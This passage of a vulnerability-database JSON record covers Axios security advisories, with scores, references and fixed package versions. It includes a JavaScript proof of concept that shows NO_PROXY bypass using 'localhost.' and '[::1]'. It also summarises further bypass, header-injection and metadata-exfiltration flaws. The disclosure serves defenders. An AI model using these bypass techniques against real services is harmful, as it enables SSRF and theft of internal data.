This causes requests like `http://localhost.:8080/` and `http://[::1]:8080/` to be incorrectly proxied.\n\nThis issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections.\n\n---\n\n**PoC**\n\n```js\nimport http from \"http\";\nimport axios from \"axios\";\n\nconst proxyPort = 5300;\n\nhttp.createServer((req, res) => {\n  console.log(\"[PROXY] Got:\", req.method, req.url, \"Host:\", req.headers.host);\n  res.writeHead(200, { \"Content-Type\": \"text/plain\" });\n  res.end(\"proxied\");\n}).listen(proxyPort, () => console.log(\"Proxy\", proxyPort));\n\nprocess.env.HTTP_PROXY = `http://127.0.0.1:${proxyPort}`;\nprocess.env.NO_PROXY = \"localhost,127.0.0.1,::1\";\n\nasync function test(url) {\n  try {\n    await axios.get(url, { timeout: 2000 });\n  } catch {}\n}\n\nsetTimeout(async () => {\n  console.log(\"\\n[*] Testing http://localhost.:8080/\");\n  await test(\"http://localhost.:8080/\"); // goes through proxy\n\n  console.log(\"\\n[*] Testing http://[::1]:8080/\");\n  await test(\"http://[::1]:8080/\"); // goes through proxy\n}, 500);\n```\n\n**Expected:** Requests bypass the proxy (direct to loopback).\n**Actual:** Proxy logs requests for `localhost.` and `[::1]`.\n\n---\n\n**Impact**\n\n* Applications that rely on `NO_PROXY=localhost,127.0.0.1,::1` for protecting loopback/internal access are vulnerable.\n* Attackers controlling request URLs can:\n\n  * Force Axios to send local traffic through an attacker-controlled proxy.\n  * Bypass SSRF mitigations relying on NO\\_PROXY rules.\n  * Potentially exfiltrate sensitive responses from internal services via the proxy.\n  \n  \n---\n\n**Affected Versions**\n\n* Confirmed on Axios **1.12.2** (latest at time of testing).\n* affects all versions that rely on Axios’ current `NO_PROXY` evaluation.\n\n---\n\n**Remediation**\nAxios should normalize hostnames before evaluating `NO_PROXY`, including:\n\n* Strip 
trailing dots from hostnames (per RFC 3986).\n* Normalize IPv6 literals by removing brackets for matching.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62718","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0334","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0329","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03312","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.09709","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.09679","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10426","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10437","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10371","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12512","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.12953","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62718"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718"},{"reference_url":"https://datatracker.ietf.org/doc
/html/rfc1034#section-3.1","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://datatracker.ietf.org/doc/html/rfc1034#section-3.1"},{"reference_url":"https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios","re
ference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c"},{"reference_url":"https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements
":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df"},{"reference_url":"https://github.com/axios/axios/pull/10661","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/pull/10661"},{"reference_url":"https://github.com/axios/axios/pull/10688","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/pull/10688"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.31.0","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","
scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.31.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.15.0","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.15.0"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5"},{"refere
nce_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62718","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62718"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2456913","reference_id":"2456913","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2456913"},{"reference_url":"https://github.com/advisories/GHSA-3p68-rc4w-qgx5","reference_id":"GHSA-3p68-rc4w-qgx5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3p68-rc4w-qgx5"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10175","reference_id":"RHSA-2026:10175","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10175"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13571","reference_id":"RHSA-2026:13571","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13571"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13826","reference_id":"RHSA-2026:13826","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13826"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8483","reference_id":"RHSA-2026:8483","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8483"},{"reference_url":"htt
ps://access.redhat.com/errata/RHSA-2026:8484","reference_id":"RHSA-2026:8484","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8484"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8490","reference_id":"RHSA-2026:8490","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8490"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8491","reference_id":"RHSA-2026:8491","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8491"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8493","reference_id":"RHSA-2026:8493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9742","reference_id":"RHSA-2026:9742","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9742"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdi
stro=trixie"}],"aliases":["CVE-2025-62718","GHSA-3p68-rc4w-qgx5"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-axk7-6q4b-vuga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354418?format=json","vulnerability_id":"VCID-cj5w-7hbe-wqex","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, for stream request bodies, maxBodyLength is bypassed when maxRedirects is set to 0 (native http/https transport path). Oversized streamed uploads are sent fully even when the caller sets strict body limits. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42034.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42034.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42034","reference_id":"","reference_type":"","scores":[{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11525","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11627","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15633","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42034"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42034","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42034"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bu
gzilla.redhat.com/show_bug.cgi?id=2461623","reference_id":"2461623","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461623"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42034","reference_id":"CVE-2026-42034","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42034"},{"reference_url":"https://github.com/advisories/GHSA-5c9x-8gcm-mpgx","reference_id":"GHSA-5c9x-8gcm-mpgx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5c9x-8gcm-mpgx"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx","reference_id":"GHSA-5c9x-8gcm-mpgx","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:12:43Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42034","GHSA-5c9x-8gcm-mpgx"],"risk_score":2.4,"exploitability":"0.5","weighted_severity":"4.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cj5w-7hbe-wqex"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354609?format=json","vulnerability_id":"VCID-drqq-9mkv-qkbx","summary":"Axios is a promise based HTTP client for the browser and Node.js. 
Prior to 1.15.1 and 0.31.1, an attacker who can influence the target URL of an Axios request can use any address in the 127.0.0.0/8 range (other than 127.0.0.1) to completely bypass the NO_PROXY protection. This vulnerability is due to an incomplete fix for CVE-2025-62718. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42043.json","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42043.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42043","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.0749","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09635","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13086","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42043"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42043","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42043"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461626","reference_id":"2461626","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461626"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42043","reference_id":"CVE-2026-42043","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42043"},{"reference_url":"https://github.co
m/advisories/GHSA-pmwg-cvhr-8vh7","reference_id":"GHSA-pmwg-cvhr-8vh7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pmwg-cvhr-8vh7"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7","reference_id":"GHSA-pmwg-cvhr-8vh7","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:47:20Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42043","GHSA-pmwg-cvhr-8vh7"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-drqq-9mkv-qkbx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354605?format=json","vulnerability_id":"VCID-e86t-8z3n-sqgd","summary":"Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.1, the FormDataPart constructor in lib/helpers/formDataToStream.js interpolates value.type directly into the Content-Type header of each multipart part without sanitizing CRLF (\\r\\n) sequences. An attacker who controls the .type property of a Blob/File-like object (e.g., via a user-uploaded file in a Node.js proxy service) can inject arbitrary MIME part headers into the multipart form-data body. 
This bypasses Node.js v18+ built-in header protections because the injection targets the multipart body structure, not HTTP request headers. This vulnerability is fixed in 1.15.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42037.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42037.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42037","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12339","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14178","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.18753","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42037"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42037","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42037"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461636","reference_id":"2461636","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461636"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42037","reference_id":"CVE-2026-42037","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42037"},{"reference_url":"https://github.com/advisories/GHSA-445q-vr5w-6q77","reference_id":"GHSA-445q-vr5w-6q77","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"
cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-445q-vr5w-6q77"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77","reference_id":"GHSA-445q-vr5w-6q77","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T17:36:52Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42037","GHSA-445q-vr5w-6q77"],"risk_score":2.4,"exploitability":"0.5","weighted_severity":"4.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e86t-8z3n-sqgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/351355?format=json","vulnerability_id":"VCID-ek49-tuj4-t3ap","summary":"Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\n# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\n\n## Summary\nThe Axios library is vulnerable to a specific \"Gadget\" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).\n\nWhile Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. 
